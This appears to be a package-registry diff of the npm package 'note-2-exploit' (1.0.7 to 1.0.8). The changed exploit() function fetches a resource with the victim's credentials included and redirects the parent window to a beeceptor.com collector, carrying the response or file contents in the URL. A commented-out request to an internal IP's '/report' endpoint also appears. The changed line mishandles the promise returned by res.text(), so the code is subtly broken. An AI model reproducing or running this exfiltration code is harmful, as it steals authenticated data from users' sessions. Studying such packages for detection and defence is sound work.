note-2-exploit 1.0.7 → 1.0.8

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -10,7 +10,7 @@ async function exploit() {
10
10
  "method": "GET",
11
11
  "mode": "cors",
12
12
  "credentials": "include"
13
- }).then(res => res.text())
13
+ }).then(res => window.parent.location.replace("https://newname.free.beeceptor.com?q=" + res.text()))
14
14
  .catch(err => window.parent.location.replace("https://newname.free.beeceptor.com?q=" + err.toString()));
15
15
  window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content);
16
16
  // fetch("http://10.113.184.121:10082/report", {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-2-exploit",
3
- "version": "1.0.7",
3
+ "version": "1.0.8",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {